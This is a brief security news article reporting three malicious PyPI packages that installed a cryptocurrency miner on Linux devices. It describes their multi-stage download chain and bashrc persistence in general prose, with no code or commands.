3 Malicious PyPI Packages Hide CoinMiner on Linux Devices
In a recent cybersecurity revelation, the Python Package Index (PyPI) has fallen victim to the infiltration of three malicious packages: modularseven, driftme, and catme. These packages, although now removed, managed to amass a concerning 431 downloads within the past month, posing a significant threat to the security of Linux devices.
The Cryptocurrency Mining Connection
Researchers Gabby Xiong of Fortinet FortiGuard Labs found that these packages are similar to one that was used in a previous campaign called culturestreak after giving them a closer look. Like previous, these malicious packages deploy a CoinMiner executable on Linux devices upon initial use, making cryptocurrency mining the primary threat.
These PyPI malicious packages successfully hide their payload, reducing the detectability of their malicious code. The primary method involves hosting the payload on a remote URL, specifically in the init.py file. This file decodes and retrieves the initial stage from a remote server, obtaining a shell script named “unmi.sh”, responsible for fetching a configuration file and the CoinMiner executable hosted on GitLab.
Execution and Persistence
The ELF binary file is then executed in the background using the nohup command, ensuring the sustained operation of the process even after the user exits the session. Notably, these packages exhibit an improvement over the culturestreak package by introducing an extra stage. This additional layer conceals their nefarious intent within the shell script, enhancing their ability to evade detection by security software and prolonging the exploitation process.
The hosting of the coin mining executables on a public GitLab repository and the configuration file on the domain papiculo[.]net reveal the ties to the culturestreak package. This connection highlights a worrying pattern in the distribution of harmful packages with common origins, underscoring the necessity for increased awareness among Python developers.
Additionally, the introduction of malicious commands into the ~/.bashrc file in these PyPI packages ensures the malware’s persistence and reactivation on the user’s device. This strategic move enables a prolonged, stealthy exploitation of the user’s device for the benefit of the attacker.
The discovery of these malicious PyPI packages underscores the evolving sophistication of cyber threats targeting the Python development ecosystem. Developers and security experts must remain vigilant, implementing robust measures to detect and prevent the infiltration of malicious packages.
The sources for this article include a story from TheHackerNews.